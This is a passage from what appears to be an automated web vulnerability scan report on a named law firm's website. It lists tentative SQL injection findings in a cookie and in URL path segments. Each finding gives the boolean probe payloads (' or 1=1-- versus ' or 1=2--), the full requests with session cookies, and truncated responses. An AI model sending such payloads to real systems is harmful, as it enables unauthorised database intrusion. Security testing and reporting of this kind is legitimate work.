The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 18153507'%20or%201%3d1--%20 and 18153507'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=18153507'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 16:11:54 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=18153507'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.85. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14260958'%20or%201%3d1--%20 and 14260958'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts14260958'%20or%201%3d1--%20/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:12:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts14260958'%20or%201%3d2--%20/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.86. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 64052056'%20or%201%3d1--%20 and 64052056'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images64052056'%20or%201%3d1--%20/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:12:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/images64052056'%20or%201%3d2--%20/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.87. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19323163'%20or%201%3d1--%20 and 19323163'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png19323163'%20or%201%3d1--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:12:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/images/arrows-default.png19323163'%20or%201%3d2--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.88. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
